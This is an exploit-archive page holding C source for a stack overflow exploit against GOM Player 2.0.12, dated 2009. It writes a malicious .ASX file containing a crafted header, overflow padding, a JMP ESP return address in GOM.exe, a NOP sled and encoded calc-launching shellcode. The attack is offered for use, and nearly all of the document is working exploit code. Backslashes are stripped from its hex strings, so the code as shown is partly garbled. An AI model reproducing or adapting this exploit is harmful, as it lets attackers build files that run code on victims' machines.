[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : GOM Player 2.0.12.3375 (.ASX File) Stack Overflow Exploit
# Published : 2009-01-08
# Author : DATA_SNIPER
# Previous Title : VUPlayer 2.49 .ASX File (HREF) Local Buffer Overflow Exploit
# Next Title : IntelliTamper (2.07/2.08) Language Catalog SEH Overflow Exploit
/*------------------------------------------------
* GOM Player 2.0.12 (.ASX) Stack Overflow Exploit
*-------------------------------------------------
* [_]Exploit Code by:DATA_SNIPER
* [_]Greetz: Arabic and algeria hackerz,arab4services.net and AT4RE Teams.
* [_]My blog:http://datasniper.arab4services.net
* NOTIFICATION:
* The vulnerabilty was reported by Parvez Anwar in Secuina after that i discovered it so all rights goes to Parvez Anwar.
* i used internal address (in GOM.exe) to JMP and run the shellcode so the exploit is Universal.
* http://secunia.com/advisories/23994
* SEH Methode can be implemented for variant exploit.
*/
#include <stdio.h>
#include <windows.h>
unsigned char Header1[] = /*ASX data in unicode format */
"xFFxFEx3Cx00x61x00x73x00x78x00x20x00x76x00x65x00x72x00x73x00x69x00x6Fx00x6Ex00x20x00x3Dx00x20x00"
"x22x00x33x00x2Ex00x30x00x22x00x20x00x3Ex00x0Dx00x0Ax00x3Cx00x65x00x6Ex00x74x00x72x00x79x00x3Ex00"
"x0Dx00x0Ax00x3Cx00x74x00x69x00x74x00x6Cx00x65x00x3Ex00x48x06x2Fx06x27x06x39x06x27x06x20x00x23x06x4Ax06x47x06"
"x27x06x20x00x27x06x44x06x28x06x37x06x44x06x2Ex00x6Dx00x70x00x33x00x3Cx00x2Fx00x74x00x69x00x74x00"
"x6Cx00x65x00x3Ex00x0Dx00x0Ax00x3Cx00x72x00x65x00x66x00x20x00x68x00x72x00x65x00x66x00x20x00x3Dx00x20x00x22";
unsigned char Header2[] ="x22x00x20x00x2Fx00x3Ex00x0Dx00x0Ax00x3Cx00x2Fx00x65x00x6Ex00x74x00x72x00x79x00x3Ex00x0Dx00x0Ax00x3Cx00x2Fx00x61x00x73x00x78x00x3Ex00x0Dx00x0Ax00";
/*windows/exec - 144 bytes,Encoder: x86/shikata_ga_nai,EXITFUNC=process, CMD=calc*/
unsigned char Shell[] =
"x31xc9xbdx90xb7x29xb8xd9xf7xd9x74x24xf4xb1x1e"
"x58x31x68x11x03x68x11x83xe8x6cx55xdcx44x64xde"
"x1fxb5x74x54x5ax89xffx16x60x89xfex09xe1x26x18"
"x5dxa9x98x19x8ax1fx52x2dxc7xa1x8ax7cx17x38xfe"
"xfax57x4fxf8xc3x92xbdx07x01xc9x4ax3cxd1x2axb7"
"x36x3cxb9xe8x9cxbfx55x70x56xb3xe2xf6x37xd7xf5"
"xe3x43xfbx7exf2xb8x8axddxd1x3ax4fx82x28xb5x2f"
"x6bx2fxb2xe9xa3x24x84xf9x48x4ax19xacxc4xc3x29"
"x27x22x90xeax5dx83xffx94x79xc1x73x01xe1xf8xfe"
"xdfx46xfax18xbcx09x68x84x43";
int main( int argc, char **argv ) {
char payload[4563];
char junk[4171];/*Overflow trigger*/
unsigned char RET_Univ[] = "x77x45x46x00"; // JMP ESP in GOM.exe this make it universal, & don't worry about nullbyte,greetz go to unicode ;)
/*char RET_sp2 = "xF3xC3xE1x77" /* if im wrong up there, use this => JMP ESP in kernel32.dll XP SP2 fr */
unsigned char nop[] = "x90x90x90x90x90x90x90x90"; //Nops
FILE *f;
printf("GOM Player 2.0.12 (.ASX) Stack Overflow Exploit by DATA_SNIPERrn");
printf("---------------------------------------------------rn");
memset(junk, 0x41, 4171);
printf("[_] Building Exploit..rn");
memcpy( payload, Header1, sizeof( Header1 ) - 1 );
memcpy( payload + sizeof( Header1 ) - 1, junk, 4172 );
memcpy( payload + sizeof( Header1 ) + sizeof(junk)-1, RET_Univ, 4 );
memcpy( payload + sizeof( Header1 ) + sizeof(junk)+sizeof(RET_Univ)-2, nop, sizeof(nop)-1 );
memcpy( payload + sizeof( Header1 ) + sizeof(junk)+sizeof(nop)+sizeof(RET_Univ)-3, Shell, sizeof( Shell ) - 1 );
memcpy( payload + sizeof( Header1 ) + sizeof(junk)+sizeof(RET_Univ)+sizeof(nop)+ sizeof(Shell)-4, Header2, sizeof( Header2 ) - 1 );
f = fopen( "GAZA.asx", "wb" );
if ( f == NULL ) {
printf("[_] Cannot create filen");
return 0;
}
fwrite( payload, 1, sizeof(payload) , f );
fclose( f );
printf("[_] GAZA.asx file Created,have unf :)rn");
return 0;
}
// www.Syue.com [2009-01-08]